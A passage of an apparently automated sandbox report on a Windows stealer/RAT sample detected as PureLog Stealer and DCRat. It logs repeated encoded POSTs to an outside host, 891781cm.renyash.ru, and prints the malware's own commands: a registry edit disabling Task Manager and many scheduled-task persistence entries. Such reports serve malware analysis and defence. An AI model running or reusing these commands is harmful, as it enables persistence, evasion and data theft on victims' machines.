                                                                                                                  Jan 1, 2025 15:03:56.902704954 CET1072OUTData Raw: 55 52 5d 54 5a 5e 54 5f 55 5a 54 59 51 52 55 56 58 5b 5c 55 59 56 52 58 5d 5b 43 5b 53 59 56 5a 47 5e 55 53 5d 5f 57 53 5d 50 51 5e 5d 54 51 58 52 51 5f 58 43 5b 54 5a 56 5e 56 5c 51 57 56 55 5a 56 5d 5b 5d 41 5a 58 5a 5c 5d 5a 5c 53 59 5f 59 52
                                                                                                                  Data Ascii: UR]TZ^T_UZTYQRUVX[\UYVRX][C[SYVZG^US]_WS]PQ^]TQXRQ_XC[TZV^V\QWVUZV][]AZXZ\]Z\SY_YRZVS\YXZ[XQ]\QU[[XTXZCUQW[VY]\P\^PPZ_Z\][TTR^Z_ZU_TY]YS\[^\ZDXZZXV[PUPGCQ\PS[YRCUZEY[QUPFU_V^T[CPZ[__S\#?548!Z&!\=,3$T,7;3?P$?;[;=.),#^!'^)
                                                                                                                  Jan 1, 2025 15:03:57.025768995 CET25INHTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 15:03:57.195359945 CET809INHTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 14:03:57 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pCtNWW%2FIGM2ucw%2B2YTq12uji9eK5mWNqqZZcnUSHfxc48KvTdi0x12ksRhAAGso5y5pWCnHfU51Ch01k%2BZcVdxOoyFUgw7BIZPTZ0LetnjvtoJp%2B5%2BLYvsFLcKb977xt8g3M1APA"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb30e411bbac32c-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=3281&min_rtt=1725&rtt_var=3759&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1416&delivery_rate=103005&cwnd=170&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41V[X0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  147192.168.2.450154104.21.38.84807448C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 15:03:57.334589005 CET344OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1072
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 15:03:57.695137978 CET1072OUTData Raw: 55 51 5d 53 5a 5c 54 58 55 5a 54 59 51 5e 55 52 58 5d 5c 58 59 5c 52 5b 5d 5b 43 5b 53 59 56 5a 47 5e 55 53 5d 5f 57 53 5d 50 51 5e 5d 54 51 58 52 51 5f 58 43 5b 54 5a 56 5e 56 5c 51 57 56 55 5a 56 5d 5b 5d 41 5a 58 5a 5c 5d 5a 5c 53 59 5f 59 52
                                                                                                                  Data Ascii: UQ]SZ\TXUZTYQ^URX]\XY\R[][C[SYVZG^US]_WS]PQ^]TQXRQ_XC[TZV^V\QWVUZV][]AZXZ\]Z\SY_YRZVS\YXZ[XQ]\QU[[XTXZCUQW[VY]\P\^PPZ_Z\][TTR^Z_ZU_TY]YS\[^\ZDXZZXV[PUPGCQ\PS[YRCUZEY[QUPFU_V^T[CPZ[__S\#+/#]2$.)>'$"._$)3;X,?*#^!'^)3
                                                                                                                  Jan 1, 2025 15:03:57.775382996 CET25INHTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 15:03:58.059123039 CET813INHTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 14:03:58 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iQvPP%2BK%2BZ%2FrR%2BXDEq5i2zmdBGUf2IscyJlXXy9gqK2qBz2vsIq1Kf7mQ%2BcmV8P2vSIIUzx9voBT68S3hPPc%2Bwg6WrW%2Fy9oiZc5bLSSqgsHRTPEWFWv8sQ8s3ZgHmkmMwz31C002B"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb30e45cc0e424a-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=3200&min_rtt=1743&rtt_var=3569&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1416&delivery_rate=108914&cwnd=251&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41V[X0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  148192.168.2.450155104.21.38.84807448C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 15:03:58.252554893 CET344OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1072
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 15:03:58.603550911 CET1072OUTData Raw: 55 52 5d 56 5a 58 51 5b 55 5a 54 59 51 59 55 53 58 58 5c 59 59 50 52 5c 5d 5b 43 5b 53 59 56 5a 47 5e 55 53 5d 5f 57 53 5d 50 51 5e 5d 54 51 58 52 51 5f 58 43 5b 54 5a 56 5e 56 5c 51 57 56 55 5a 56 5d 5b 5d 41 5a 58 5a 5c 5d 5a 5c 53 59 5f 59 52
                                                                                                                  Data Ascii: UR]VZXQ[UZTYQYUSXX\YYPR\][C[SYVZG^US]_WS]PQ^]TQXRQ_XC[TZV^V\QWVUZV][]AZXZ\]Z\SY_YRZVS\YXZ[XQ]\QU[[XTXZCUQW[VY]\P\^PPZ_Z\][TTR^Z_ZU_TY]YS\[^\ZDXZZXV[PUPGCQ\PS[YRCUZEY[QUPFU_V^T[CPZ[__S\#?-4;:%>)X(.($%-B+$/%0<?;X ?.$=<#^!'^)/
                                                                                                                  Jan 1, 2025 15:03:58.711599112 CET25INHTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 15:03:58.961337090 CET805INHTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 14:03:58 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1lGWXvplnVRruZbkrkstldcSW3QCkNySKolez%2BjD46DZYh3MGmpmlumgpenMSPI8fIb7wk0PCwC%2BNNN6B86k9fdzxulNKxGAO1BzRoPGe81wGlplHzh%2FEOIIdtEbKsuMf8RN0o6G"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb30e4ba94b4240-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=7033&min_rtt=1759&rtt_var=11209&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1416&delivery_rate=33213&cwnd=242&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41V[X0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  149192.168.2.450156104.21.38.84807448C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 15:03:59.113854885 CET344OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1072
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 15:03:59.462802887 CET1072OUTData Raw: 50 55 5d 54 5a 5e 54 5a 55 5a 54 59 51 5f 55 53 58 59 5c 54 59 57 52 5e 5d 5b 43 5b 53 59 56 5a 47 5e 55 53 5d 5f 57 53 5d 50 51 5e 5d 54 51 58 52 51 5f 58 43 5b 54 5a 56 5e 56 5c 51 57 56 55 5a 56 5d 5b 5d 41 5a 58 5a 5c 5d 5a 5c 53 59 5f 59 52
                                                                                                                  Data Ascii: PU]TZ^TZUZTYQ_USXY\TYWR^][C[SYVZG^US]_WS]PQ^]TQXRQ_XC[TZV^V\QWVUZV][]AZXZ\]Z\SY_YRZVS\YXZ[XQ]\QU[[XTXZCUQW[VY]\P\^PPZ_Z\][TTR^Z_ZU_TY]YS\[^\ZDXZZXV[PUPGCQ\PS[YRCUZEY[QUPFU_V^T[CPZ[__S\#)<!\ +%[2=-($B&T.4($"V3<(;=4]<((,#^!'^)7
                                                                                                                  Jan 1, 2025 15:03:59.566910028 CET25INHTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 15:03:59.833519936 CET800INHTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 14:03:59 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cQq8OdDg4rNDQZX5dW9bt8adT6jD1n1GqHh0DKY7LsL8CTIKzsUc%2FzbOBCfzJzZ7GwxR6sp3tTCVU9F1QrgZLkioogIgHeIGnNXeG2JoVpwVpaJeylTrL6d7WtFKWaHvHUCxDumO"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb30e50f9c83354-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=3910&min_rtt=1900&rtt_var=4732&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1416&delivery_rate=81201&cwnd=113&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41V[X0


                                                                                                                  Statistics

                                                                                                                  CPU Usage

                                                                                                                  Click to jump to process

                                                                                                                  Memory Usage

                                                                                                                  Click to jump to process

                                                                                                                  High Level Behavior Distribution

                                                                                                                  Click to dive into process behavior distribution

                                                                                                                  Behavior

                                                                                                                  Click to jump to process

                                                                                                                  System Behavior

                                                                                                                  General

                                                                                                                  Target ID:0
                                                                                                                  Start time:09:01:56
                                                                                                                  Start date:01/01/2025
                                                                                                                  Path:C:\Users\user\Desktop\1znAXdPcM5.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:"C:\Users\user\Desktop\1znAXdPcM5.exe"
                                                                                                                  Imagebase:0x580000
                                                                                                                  File size:2'236'943 bytes
                                                                                                                  MD5 hash:E656DB3DEB4CF58570317E64607C5420
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Yara matches:
                                                                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000003.1669164420.0000000006D8A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000003.1669786460.00000000056C6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  Reputation:low
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:1
                                                                                                                  Start time:09:01:56
                                                                                                                  Start date:01/01/2025
                                                                                                                  Path:C:\Windows\SysWOW64\wscript.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\jb23QgoxZwrgcyya3I3hQ2gDGXuWLnkOXZaTu.vbe"
                                                                                                                  Imagebase:0xfb0000
                                                                                                                  File size:147'456 bytes
                                                                                                                  MD5 hash:FF00E0480075B095948000BDC66E81F0
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:2
                                                                                                                  Start time:09:01:59
                                                                                                                  Start date:01/01/2025
                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\ELi4IhX1eHmQ2UsaOienYgDzI4HKnyNJ9ZRwGYArPHIQTcsLe.bat" "
                                                                                                                  Imagebase:0x240000
                                                                                                                  File size:236'544 bytes
                                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:3
                                                                                                                  Start time:09:01:59
                                                                                                                  Start date:01/01/2025
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                                  File size:862'208 bytes
                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:4
                                                                                                                  Start time:09:01:59
                                                                                                                  Start date:01/01/2025
                                                                                                                  Path:C:\Windows\SysWOW64\reg.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
                                                                                                                  Imagebase:0xe10000
                                                                                                                  File size:59'392 bytes
                                                                                                                  MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:5
                                                                                                                  Start time:09:01:59
                                                                                                                  Start date:01/01/2025
                                                                                                                  Path:C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:"C:\Users\user\AppData\Roaming\/Local/discord/surrogateWinMonitordll/Agentcomponentbrokermonitordhcp.exe"
                                                                                                                  Imagebase:0xb0000
                                                                                                                  File size:1'914'880 bytes
                                                                                                                  MD5 hash:86AF92730370230540800E6D509E4155
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Yara matches:
                                                                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000005.00000000.1700421210.00000000000B2000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000005.00000002.1748446594.00000000127DA000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exe, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exe, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exe, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exe, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exe, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exe, Author: Joe Security
                                                                                                                  Antivirus matches:
                                                                                                                  • Detection: 100%, Avira
                                                                                                                  • Detection: 100%, Joe Sandbox ML
                                                                                                                  • Detection: 71%, ReversingLabs
                                                                                                                  Reputation:low
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:6
                                                                                                                  Start time:09:02:01
                                                                                                                  Start date:01/01/2025
                                                                                                                  Path:C:\Windows\System32\schtasks.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:schtasks.exe /create /tn "aXnWbWpBWYJmkhPMHrrUNMa" /sc MINUTE /mo 9 /tr "'C:\Users\Default\aXnWbWpBWYJmkhPMHrrUNM.exe'" /f
                                                                                                                  Imagebase:0x7ff76f990000
                                                                                                                  File size:235'008 bytes
                                                                                                                  MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:7
                                                                                                                  Start time:09:02:01
                                                                                                                  Start date:01/01/2025
                                                                                                                  Path:C:\Windows\System32\schtasks.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:schtasks.exe /create /tn "aXnWbWpBWYJmkhPMHrrUNM" /sc ONLOGON /tr "'C:\Users\Default\aXnWbWpBWYJmkhPMHrrUNM.exe'" /rl HIGHEST /f
                                                                                                                  Imagebase:0x7ff76f990000
                                                                                                                  File size:235'008 bytes
                                                                                                                  MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:8
                                                                                                                  Start time:09:02:01
                                                                                                                  Start date:01/01/2025
                                                                                                                  Path:C:\Windows\System32\schtasks.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:schtasks.exe /create /tn "aXnWbWpBWYJmkhPMHrrUNMa" /sc MINUTE /mo 6 /tr "'C:\Users\Default\aXnWbWpBWYJmkhPMHrrUNM.exe'" /rl HIGHEST /f
                                                                                                                  Imagebase:0x7ff76f990000
                                                                                                                  File size:235'008 bytes
                                                                                                                  MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:9
                                                                                                                  Start time:09:02:01
                                                                                                                  Start date:01/01/2025
                                                                                                                  Path:C:\Windows\System32\schtasks.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:schtasks.exe /create /tn "aXnWbWpBWYJmkhPMHrrUNMa" /sc MINUTE /mo 8 /tr "'C:\Recovery\aXnWbWpBWYJmkhPMHrrUNM.exe'" /f
                                                                                                                  Imagebase:0x7ff76f990000
                                                                                                                  File size:235'008 bytes
                                                                                                                  MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:10
                                                                                                                  Start time:09:02:01
                                                                                                                  Start date:01/01/2025
                                                                                                                  Path:C:\Windows\System32\schtasks.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:schtasks.exe /create /tn "aXnWbWpBWYJmkhPMHrrUNM" /sc ONLOGON /tr "'C:\Recovery\aXnWbWpBWYJmkhPMHrrUNM.exe'" /rl HIGHEST /f
                                                                                                                  Imagebase:0x7ff76f990000
                                                                                                                  File size:235'008 bytes
                                                                                                                  MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:11
                                                                                                                  Start time:09:02:01
                                                                                                                  Start date:01/01/2025
                                                                                                                  Path:C:\Windows\System32\schtasks.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:schtasks.exe /create /tn "aXnWbWpBWYJmkhPMHrrUNMa" /sc MINUTE /mo 5 /tr "'C:\Recovery\aXnWbWpBWYJmkhPMHrrUNM.exe'" /rl HIGHEST /f
                                                                                                                  Imagebase:0x7ff76f990000
                                                                                                                  File size:235'008 bytes
                                                                                                                  MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:12
                                                                                                                  Start time:09:02:02
                                                                                                                  Start date:01/01/2025
                                                                                                                  Path:C:\Windows\System32\schtasks.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:schtasks.exe /create /tn "aXnWbWpBWYJmkhPMHrrUNMa" /sc MINUTE /mo 9 /tr "'C:\Recovery\aXnWbWpBWYJmkhPMHrrUNM.exe'" /f
                                                                                                                  Imagebase:0x7ff76f990000
                                                                                                                  File size:235'008 bytes
                                                                                                                  MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:13
                                                                                                                  Start time:09:02:02
                                                                                                                  Start date:01/01/2025
                                                                                                                  Path:C:\Windows\System32\schtasks.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:schtasks.exe /create /tn "aXnWbWpBWYJmkhPMHrrUNM" /sc ONLOGON /tr "'C:\Recovery\aXnWbWpBWYJmkhPMHrrUNM.exe'" /rl HIGHEST /f
                                                                                                                  Imagebase:0x7ff76f990000
                                                                                                                  File size:235'008 bytes
                                                                                                                  MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:14
                                                                                                                  Start time:09:02:02
                                                                                                                  Start date:01/01/2025
                                                                                                                  Path:C:\Windows\System32\schtasks.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:schtasks.exe /create /tn "aXnWbWpBWYJmkhPMHrrUNMa" /sc MINUTE /mo 11 /tr "'C:\Recovery\aXnWbWpBWYJmkhPMHrrUNM.exe'" /rl HIGHEST /f
                                                                                                                  Imagebase:0x7ff76f990000
                                                                                                                  File size:235'008 bytes
                                                                                                                  MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:15
                                                                                                                  Start time:09:02:02
                                                                                                                  Start date:01/01/2025
                                                                                                                  Path:C:\Windows\System32\schtasks.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:schtasks.exe /create /tn "aXnWbWpBWYJmkhPMHrrUNMa" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe'" /f
                                                                                                                  Imagebase:0x7ff76f990000
                                                                                                                  File size:235'008 bytes
                                                                                                                  MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:16
                                                                                                                  Start time:09:02:02
                                                                                                                  Start date:01/01/2025
                                                                                                                  Path:C:\Windows\System32\schtasks.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:schtasks.exe /create /tn "aXnWbWpBWYJmkhPMHrrUNM" /sc ONLOGON /tr "'C:\Program Files (x86)\java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe'" /rl HIGHEST /f
                                                                                                                  Imagebase:0x7ff76f990000
                                                                                                                  File size:235'008 bytes
                                                                                                                  MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:17
                                                                                                                  Start time:09:02:03
                                                                                                                  Start date:01/01/2025
                                                                                                                  Path:C:\Windows\System32\schtasks.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:schtasks.exe /create /tn "aXnWbWpBWYJmkhPMHrrUNMa" /sc MINUTE /mo 10 /tr "'C:\Program Files (x86)\java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe'" /rl HIGHEST /f
                                                                                                                  Imagebase:0x7ff76f990000
                                                                                                                  File size:235'008 bytes
                                                                                                                  MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:18
                                                                                                                  Start time:09:02:03
                                                                                                                  Start date:01/01/2025
                                                                                                                  Path:C:\Windows\System32\schtasks.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\microsoft\Temp\EUC7A5.tmp\RuntimeBroker.exe'" /f
                                                                                                                  Imagebase:0x7ff76f990000
                                                                                                                  File size:235'008 bytes
                                                                                                                  MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:19
                                                                                                                  Start time:09:02:03
                                                                                                                  Start date:01/01/2025
                                                                                                                  Path:C:\Windows\System32\schtasks.exe
                                                                                                                  Wow64 process (32bit):false
